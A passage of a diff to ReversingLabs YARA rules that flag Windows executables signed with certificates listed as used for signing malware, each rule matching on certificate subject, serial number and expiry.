+		logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18509,21 +40903,21 @@ rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and ( pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures [ i ] . serial == "83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" ) and 1612137600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fdb1903b-15c1-5cb7-892f-58957303d3b4"
+		id = "80478430-ce01-5fae-bcaf-2b7a445bc20d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8416-L8432"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2412-L2430"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc"
+		logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18533,21 +40927,21 @@ rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and ( pe.signatures [ i ] . serial == "00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures [ i ] . serial == "86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" ) and 1384300799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d6cb1371-113d-5155-aed2-c575321f0973"
+		id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8434-L8450"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2432-L2448"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0"
+		logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18557,21 +40951,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures [ i ] . serial == "4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3cde0016-14d8-5b3a-860e-f5128f899542"
+		id = "2641eb86-94f0-537c-a82a-6a5e1596ee84"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8452-L8470"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2450-L2466"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa"
+		logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18581,21 +40975,21 @@ rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and ( pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures [ i ] . serial == "86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" ) and 1611273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "226371ea-670f-52f2-8dfc-78b30a29a5cc"
+		id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8472-L8490"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2468-L2484"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e"
+		logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18605,21 +40999,21 @@ rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and ( pe.signatures [ i ] . serial == "00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures [ i ] . serial == "d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" ) and 1617667200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "41b2e05f-1dcd-5ebc-97da-275512deaf72"
+		id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8492-L8510"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2486-L2504"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16"
+		logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18629,21 +41023,21 @@ rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and ( pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures [ i ] . serial == "d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" ) and 1611187200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CharacTell Ltd" and ( pe.signatures [ i ] . serial == "00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures [ i ] . serial == "9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" ) and 1380671999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "97f791d5-7a73-5da7-984e-32bb94d0e83f"
+		id = "975cd500-2f08-55c9-a821-4dde3a54ae0c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8512-L8528"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2506-L2522"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0"
+		logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18653,21 +41047,21 @@ rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haivision Network Video" and pe.signatures [ i ] . serial == "5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf"
+		id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8530-L8546"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2524-L2540"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad"
+		logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18677,21 +41071,21 @@ rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Calibration Consultants" and pe.signatures [ i ] . serial == "6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4a3ffa4a-c080-5d76-9655-010cde091ae2"
+		id = "c20b81a1-7331-57a9-9daf-007ec516a473"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8548-L8564"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2542-L2558"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03"
+		logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18701,21 +41095,21 @@ rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Plugin Ltda" and pe.signatures [ i ] . serial == "57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2"
+		id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8566-L8582"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2560-L2576"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d"
+		logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18725,21 +41119,21 @@ rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOLGA KAPLAN" and pe.signatures [ i ] . serial == "01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "656bb2a6-bb41-5190-af10-280351e64c66"
+		id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8584-L8600"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2578-L2594"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1"
+		logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18749,21 +41143,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSPro Labs" and pe.signatures [ i ] . serial == "78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f"
+		id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8602-L8618"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2596-L2612"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e"
+		logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18773,21 +41167,21 @@ rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AUTO RESPONSE LTD CYF" and pe.signatures [ i ] . serial == "63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tera information Technology co.Ltd" and pe.signatures [ i ] . serial == "11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "55497d57-7d4f-50e1-85a6-e60786084e3f"
+		id = "90fab567-f39f-5d0b-b0d9-a93693a05a01"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8620-L8636"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2614-L2632"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1"
+		logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18797,21 +41191,21 @@ rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and ( pe.signatures [ i ] . serial == "00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures [ i ] . serial == "aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" ) and 1295481599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6a8f3abd-199c-5e2f-a60e-46e869831445"
+		id = "fde17cc1-a968-5134-b12b-d65cb34c086f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8638-L8656"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2634-L2652"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324"
+		logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18821,21 +41215,21 @@ rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
 		importance = 25
 
 	condition:
